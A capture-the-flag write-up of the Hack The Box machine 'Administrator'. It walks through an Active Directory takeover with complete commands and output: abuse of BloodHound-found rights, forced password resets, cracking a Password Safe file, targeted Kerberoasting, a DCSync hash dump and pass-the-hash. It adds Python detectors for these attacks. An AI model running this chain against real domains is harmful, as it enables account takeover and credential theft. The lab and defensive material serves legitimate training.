HTB: Administrator

Introduction

Administrator is an Active Directory focused box that starts with an assumed breach: one set of credentials, which I can use to collect BloodHound data. From that data there is a clear attack chain abusing the privileges BloodHound reveals. The chain ends with the discovery of a Password Safe file containing more credentials, which opens a new path to root that ends with a DCSync attack dumping the domain administrator's hash and completely compromising the domain.

As is common in real life Windows pentests, you will start the Administrator box with credentials for the following account:

Username: Olivia Password: ichliebedich

Recon

nmap

nmap finds lots of TCP ports:

sudo nmap -sC -sV -vv -oA nmap_scan/nmap_results 10.129.8.125
  • -sC runs the default scripts
  • -sV enumerates service versions
  • -vv is double verbose
  • -oA writes output in all formats
PORT     STATE SERVICE       REASON          VERSION
21/tcp   open  ftp           syn-ack ttl 127 Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
53/tcp   open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp   open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-12-09 16:11:13Z)
135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds? syn-ack ttl 127
464/tcp  open  kpasswd5?     syn-ack ttl 127
593/tcp  open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped    syn-ack ttl 127
3268/tcp open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped    syn-ack ttl 127
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h00m50s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 55604/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 46728/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 60636/udp): CLEAN (Timeout)
|   Check 4 (port 46791/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time: 
|   date: 2025-12-09T16:11:21
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Based on the open ports, the box is a Windows Domain Controller. The domain is administrator.htb and the hostname is DC.

FTP is also open, which is not standard for a DC.

I can generate a hosts file:

└─$ netexec smb 10.129.8.125 --generate-hosts-file administrator.hosts
SMB         10.129.8.125    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)

└─$ cat administrator.hosts 
10.129.8.125     DC.administrator.htb administrator.htb DC

and add it to /etc/hosts

Initial Credentials

The initial credentials work for both SMB and LDAP:

└─$ netexec smb administrator.htb -u Olivia -p ichliebedich          
SMB         10.129.8.125    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)                                                                                                           
SMB         10.129.8.125    445    DC               [+] administrator.htb\Olivia:ichliebedich 


└─$ netexec ldap administrator.htb -u Olivia -p ichliebedich
LDAP        10.129.8.125    389    DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:administrator.htb)
LDAP        10.129.8.125    389    DC               [+] administrator.htb\Olivia:ichliebedich

SMB - TCP 445

Looking at SMB, there is nothing of interest.

└─$ smbclient -L //administrator.htb/ -U 'Olivia%ichliebedich'                                       
        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to administrator.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

BloodHound

With SMB a dead end for the moment, the next best thing is BloodHound:

└─$ bloodhound-ce-python -c all -d administrator.htb -u Olivia -p 'ichliebedich' -ns 10.129.8.125 --zip
INFO: BloodHound.py for BloodHound Community Edition
INFO: Found AD domain: administrator.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 11 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.administrator.htb
INFO: Done in 00M 06S
INFO: Compressing output into 20251209042654_bloodhound.zip

The BloodHound output shows a clear attack chain.

I have credentials for Olivia, who has GenericAll rights over the next user, Michael.

The next step will be to move from Michael to Benjamin using the ForceChangePassword rights Michael has.

And finally I will have access to the SHARE MODERATORS group via its member Benjamin.

[Figure: BH1]
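
For the defensive side of the same graph, here is an added example (not part of the original post) that searches a constructed edge list built from the relationships in this write-up for principals with a control path to the domain object. The `DOMAIN` node label and the `StoredCredential` edge type are assumptions of this example, not BloodHound names.

```python
from collections import deque

# Constructed edge list: (source, relationship, target), taken from the
# relationships this write-up reads out of BloodHound. "DOMAIN" stands for
# the domain object; it is a label chosen for this example.
ACL_EDGES = [
    ("Olivia", "GenericAll", "Michael"),
    ("Michael", "ForceChangePassword", "Benjamin"),
    ("Benjamin", "MemberOf", "Share Moderators"),
    ("Emily", "GenericWrite", "Ethan"),
    ("Ethan", "DCSync", "DOMAIN"),
]

# Relationships that hand the source control of (or the identity of) the target.
CONTROL_RIGHTS = {"GenericAll", "GenericWrite", "ForceChangePassword",
                  "WriteDacl", "WriteOwner", "MemberOf", "DCSync",
                  "StoredCredential"}  # StoredCredential: hypothetical edge type


def shortest_control_path(edges, start, goal="DOMAIN"):
    """Breadth-first search over control edges; returns the edge list or None."""
    adjacency = {}
    for src, right, dst in edges:
        if right in CONTROL_RIGHTS:
            adjacency.setdefault(src, []).append((right, dst))
    queue, seen = deque([(start, [])]), {start}
    while queue:
        node, path = queue.popleft()
        if node == goal:
            return path
        for right, dst in adjacency.get(node, []):
            if dst not in seen:
                seen.add(dst)
                queue.append((dst, path + [(node, right, dst)]))
    return None


def principals_reaching_domain(edges):
    """Every source principal that has some control path to the domain object."""
    sources = {src for src, _, _ in edges}
    return sorted(s for s in sources if shortest_control_path(edges, s))


# Secrets at rest are edges too: the Password Safe backup readable by Benjamin
# held Emily's working password. Modelled here as a constructed extra edge.
WITH_SECRETS = ACL_EDGES + [("Benjamin", "StoredCredential", "Emily")]

if __name__ == "__main__":
    print("ACL only:     ", principals_reaching_domain(ACL_EDGES))
    print("ACL + secrets:", principals_reaching_domain(WITH_SECRETS))
    for edge in shortest_control_path(WITH_SECRETS, "Olivia"):
        print("  %s -[%s]-> %s" % edge)
```

On ACL edges alone, Olivia has no path to the domain; the path only closes once the stored credential is modelled as an edge.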

Attack chain

Shell as Michael

Starting with Michael I will change his password:

└─$ bloodyAD --host administrator.htb -d dc.administrator.htb -u Olivia -p "ichliebedich" set password "Michael" "Pwned123"
[+] Password changed successfully!

Testing the new password:

└─$ netexec smb administrator.htb -u Michael -p Pwned123     
SMB         10.129.8.125    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)                                                                                                           
SMB         10.129.8.125    445    DC               [+] administrator.htb\Michael:Pwned123

I can use evil-winrm -i 10.129.8.125 -u Michael -p 'Pwned123' to log in over WinRM, but there was nothing of interest.

Shell as Benjamin

With Michael owned I can move to the next target. ForceChangePassword is much more restrictive than GenericAll, so I do not have the same wealth of options, but the simplest one remains: I can again change the password:

└─$ bloodyAD --host administrator.htb -d dc.administrator.htb -u Michael -p "Pwned123" set password "Benjamin" "Pwned123"
[+] Password changed successfully!

Testing the new password:

└─$ netexec smb administrator.htb -u Benjamin -p Pwned123                                                         
SMB         10.129.8.125    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)                                                                                                           
SMB         10.129.8.125    445    DC               [+] administrator.htb\Benjamin:Pwned123 

It works for SMB, but this time not for WinRM. It does work for FTP:

└─$ netexec ftp administrator.htb -u Benjamin -p Pwned123
FTP         10.129.8.125    21     administrator.htb [+] Benjamin:Pwned123
└─$ ftp administrator.htb
Connected to DC.administrator.htb.
220 Microsoft FTP Service
Name (administrator.htb:kali): Benjamin
331 Password required
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp>

There is a Backup.psafe3 file I can download and work with on my machine:

ftp> ls
229 Entering Extended Passive Mode (|||50077|)
125 Data connection already open; Transfer starting.
10-05-24  08:13AM                  952 Backup.psafe3
226 Transfer complete.

ftp> binary
200 Type set to I.

ftp> get Backup.psafe3
local: Backup.psafe3 remote: Backup.psafe3
229 Entering Extended Passive Mode (|||50078|)
125 Data connection already open; Transfer starting.
100% |***************************************************************************************|   952       40.47 KiB/s    00:00 ETA
226 Transfer complete.
952 bytes received in 00:00 (37.94 KiB/s)

ftp>

Backup.psafe3

A .psafe3 file is an encrypted Password Safe database file, used to securely store usernames, passwords, and other sensitive info, accessible only with a master password.

With the file in my possession I can try to crack it.

└─$ hashcat -m 5200 Backup.psafe3 ~/Tools/rockyou.txt
hashcat (v6.2.6) starting

< SNIP >

Host memory required for this attack: 1 MB

Dictionary cache hit:
* Filename..: /home/kali/Tools/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384

Backup.psafe3:tekieromucho                                
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5200 (Password Safe v3)
Hash.Target......: Backup.psafe3
Time.Started.....: Tue Dec  9 05:29:41 2025 (1 sec)
Time.Estimated...: Tue Dec  9 05:29:42 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/home/kali/Tools/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:     9669 H/s (7.03ms) @ Accel:256 Loops:256 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 6144/14344384 (0.04%)
Rejected.........: 0/6144 (0.00%)
Restore.Point....: 4608/14344384 (0.03%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:2048-2049
Candidate.Engine.: Device Generator
Candidates.#1....: terminator -> horoscope
Hardware.Mon.#1..: Util: 55%

Started: Tue Dec  9 05:29:13 2025
Stopped: Tue Dec  9 05:29:43 2025

And there is a hit giving me the master password: tekieromucho

Opening the file with the Password Safe app gives me three passwords:

-   emma:WwANQWnmJnGV07WQN8bMS7FMAbjNur
-   emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb
-   alexandr:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw

To validate them I will try them on SMB:

└─$ netexec smb administrator.htb -u emma -p 'WwANQWnmJnGV07WQN8bMS7FMAbjNur'
SMB         10.129.8.125    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)                                                                                                           
SMB         10.129.8.125    445    DC               [-] administrator.htb\emma:WwANQWnmJnGV07WQN8bMS7FMAbjNur STATUS_LOGON_FAILURE 

└─$ netexec smb administrator.htb -u emily -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'
SMB         10.129.8.125    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)                                                                                                           
SMB         10.129.8.125    445    DC               [+] administrator.htb\emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb 

└─$ netexec smb administrator.htb -u alexandr -p 'UrkIbagoxMyUGw0aPlj9B0AXSea4Sw'
SMB         10.129.8.125    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)                                                                                                           
SMB         10.129.8.125    445    DC               [-] administrator.htb\alexandr:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw STATUS_LOGON_FAILURE

Only one, emily, works!

I can use Evil-WinRM to get in and grab the user flag:

└─$ evil-winrm -i 10.129.8.125 -u Emily -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'
 
Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine                                                                                                
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily\Documents> cat ../Desktop/user.txt
580d91f************29edaf2a287
*Evil-WinRM* PS C:\Users\emily\Documents> 

Looking back at BloodHound, there is a clear next step:

[Figure: BH2]

Emily has GenericWrite rights over another account, Ethan, who is the key to the domain as he has DCSync privileges over the domain.

Ethan password

Generic Write access grants you the ability to write to any non-protected attribute on the target object, including “members” for a group, and “servicePrincipalNames” for a user.

GenericWrite gives me enough privileges to perform targeted Kerberoasting.

I can assign an SPN to ethan, request a ticket for that fake service, and get a ticket encrypted with ethan’s password hash, which I can try to crack offline.

Or I can use a script that does all of that automatically, after syncing my clock with the DC because Kerberos rejected the earlier attempt for clock skew:

└─$ sudo ntpdate administrator.htb                                                                                  
2025-12-09 13:24:22.188698 (-0500) +25251.033755 +/- 0.012476 administrator.htb 10.129.8.125 s1 no-leap
CLOCK: time stepped by 25251.033755

└─$ python3 targetedKerberoast.py -v -d administrator.htb -u emily -p "UXLCI5iETUsIBoFVTj8yQFKoHjXmb"
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (ethan)
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$7994c13865d2d1f7edd3c63d5806d9d2$< SNIP >
[VERBOSE] SPN removed successfully for (ethan)
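
The add-SPN, request-ticket, remove-SPN sequence in the output above leaves a recognisable trail on the DC. As an added example (not part of the original post or of targetedKerberoast.py), this correlates directory-change events (ID 5136) with service-ticket requests (ID 4769) over constructed sample events; the normalised field names are assumptions of this example.

```python
from datetime import datetime, timedelta

RC4_HMAC = 0x17  # etype 23, the "$krb5tgs$23$" prefix in the hash above
SPN_ATTR = "serviceprincipalname"


def _t(s):
    return datetime.fromisoformat(s)


# Constructed, already-normalised events. Field names are this example's own;
# 5136 = directory object modified, 4769 = Kerberos service ticket requested.
SAMPLE_EVENTS = [
    {"time": _t("2025-12-09T18:24:30"), "event_id": 5136, "actor": "emily",
     "target": "ethan", "object_class": "user",
     "attribute": "servicePrincipalName", "op": "add"},
    {"time": _t("2025-12-09T18:24:31"), "event_id": 4769, "actor": "emily",
     "service": "ethan", "etype": 0x17},
    {"time": _t("2025-12-09T18:24:32"), "event_id": 5136, "actor": "emily",
     "target": "ethan", "object_class": "user",
     "attribute": "servicePrincipalName", "op": "delete"},
    # Benign: an admin registers an SPN on a service account, clients use AES.
    {"time": _t("2025-12-09T09:00:00"), "event_id": 5136, "actor": "admin1",
     "target": "svc_sql", "object_class": "user",
     "attribute": "servicePrincipalName", "op": "add"},
    {"time": _t("2025-12-09T09:02:00"), "event_id": 4769, "actor": "alice",
     "service": "svc_sql", "etype": 0x12},
]


def find_targeted_kerberoast(events, window=timedelta(minutes=5)):
    """Flag an SPN added to a user, then an RC4 ticket request by the same actor."""
    events = sorted(events, key=lambda e: e["time"])
    findings = []
    for i, ev in enumerate(events):
        if (ev["event_id"] != 5136 or ev["op"] != "add"
                or ev["object_class"] != "user"
                or ev["attribute"].lower() != SPN_ATTR):
            continue
        nearby = [x for x in events[i + 1:] if x["time"] - ev["time"] <= window]
        ticket = next((x for x in nearby
                       if x["event_id"] == 4769
                       and x["service"].lower() == ev["target"].lower()
                       and x["actor"].lower() == ev["actor"].lower()
                       and x["etype"] == RC4_HMAC), None)
        if ticket is None:
            continue
        # The SPN being deleted again right after the request strengthens the signal.
        removed = any(x["event_id"] == 5136 and x["op"] == "delete"
                      and x["attribute"].lower() == SPN_ATTR
                      and x["target"] == ev["target"]
                      and x["time"] >= ticket["time"] for x in nearby)
        findings.append({"actor": ev["actor"], "target": ev["target"],
                         "spn_removed": removed,
                         "seconds_to_ticket":
                             (ticket["time"] - ev["time"]).total_seconds()})
    return findings
```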

Now I can attempt to crack it:

└─$ hashcat -m 13100  ethan.hash ~/Tools/rockyou.txt
hashcat (v6.2.6) starting

< SNIP >

Dictionary cache hit:
* Filename..: /home/kali/Tools/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384

$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$7994c138653cfcb4cf2< SNIP >
81755769b4480cf22408e1150e383212a370bdc6e9061d6d5e37850d09a78207fc91949e1792efdb6:limpbizkit
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator....2efdb6
Time.Started.....: Tue Dec  9 06:26:19 2025 (0 secs)
Time.Estimated...: Tue Dec  9 06:26:19 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/home/kali/Tools/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   569.5 kH/s (2.27ms) @ Accel:1024 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 6144/14344384 (0.04%)
Rejected.........: 0/6144 (0.00%)
Restore.Point....: 0/14344384 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 123456 -> horoscope
Hardware.Mon.#1..: Util: 36%

Started: Tue Dec  9 06:26:01 2025
Stopped: Tue Dec  9 06:26:21 2025

The cracked password limpbizkit works:

└─$ netexec smb administrator.htb -u Ethan -p 'limpbizkit'               
SMB         10.129.8.125    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)                                                                                                           
SMB         10.129.8.125    445    DC               [+] administrator.htb\Ethan:limpbizkit

Now I can move on to Administrator.

Shell as Administrator

The Ethan user has DCSync privileges over the domain:

[Figure: BH3]

With these rights I can dump hashes for the entire domain using secretsdump from Impacket:

└─$ impacket-secretsdump ethan:limpbizkit@administrator.htb
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:04ebb1d6ca2529562dc0f66cd47e6f02:::
administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:04ebb1d6ca2529562dc0f66cd47e6f02:::
administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::
administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::
[*] Kerberos keys grabbed
[*] Cleaning up...
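
Replication through DRSUAPI by anything other than a domain controller is what gives this step away. As an added example (not part of the original post), this flags non-DC accounts exercising the replication control-access rights in object-access events (ID 4662); the events are constructed, the normalised field names are assumptions of this example, and `svc_inventory` is a made-up account.

```python
# Control-access-right GUIDs for directory replication.
REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
USER_CLASS = "bf967aba-0de6-11d0-a285-00aa003049e2"  # schema GUID of class "user"
CONTROL_ACCESS = 0x100  # access-mask bit for extended (control access) rights

# Constructed, normalised event ID 4662 records ("an operation was performed
# on an object"). Field names are this example's own.
SAMPLE_4662 = [
    # Legitimate DC-to-DC style replication by the machine account.
    {"event_id": 4662, "subject": "DC$", "access_mask": 0x100,
     "properties": [REPL_GET_CHANGES, REPL_GET_CHANGES_ALL]},
    # The two rights may be logged in separate events for one account.
    {"event_id": 4662, "subject": "ethan", "access_mask": 0x100,
     "properties": ["{" + REPL_GET_CHANGES.upper() + "}"]},
    {"event_id": 4662, "subject": "ethan", "access_mask": 0x100,
     "properties": ["{" + REPL_GET_CHANGES_ALL.upper() + "}"]},
    # Get-Changes alone does not return password data.
    {"event_id": 4662, "subject": "svc_inventory", "access_mask": 0x100,
     "properties": [REPL_GET_CHANGES]},
    # Ordinary property read on a user object.
    {"event_id": 4662, "subject": "olivia", "access_mask": 0x10,
     "properties": [USER_CLASS]},
]


def find_dcsync(events, known_dcs=("DC$",)):
    """Return non-DC subjects that exercised DS-Replication-Get-Changes-All."""
    allow = {name.lower() for name in known_dcs}
    rights_by_subject = {}
    for ev in events:
        if ev["event_id"] != 4662 or not ev["access_mask"] & CONTROL_ACCESS:
            continue
        subject = ev["subject"].lower()
        if subject in allow:
            continue
        # GUIDs appear with or without braces and in either case.
        guids = {p.lower().strip("{}") for p in ev["properties"]}
        rights_by_subject.setdefault(subject, set()).update(
            guids & {REPL_GET_CHANGES, REPL_GET_CHANGES_ALL})
    return sorted(s for s, rights in rights_by_subject.items()
                  if REPL_GET_CHANGES_ALL in rights)


if __name__ == "__main__":
    print(find_dcsync(SAMPLE_4662))
```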

With the Administrator account's NT hash I can get a shell with Evil-WinRM:

└─$ evil-winrm -i administrator.htb -u administrator -H 3dc553ce4b9fd20bd016e098d2d2fd2e

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine                                                                                                
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
93345eb7f***********63a26165

*Evil-WinRM* PS C:\Users\Administrator\Documents> 

With the root flag captured I am done!
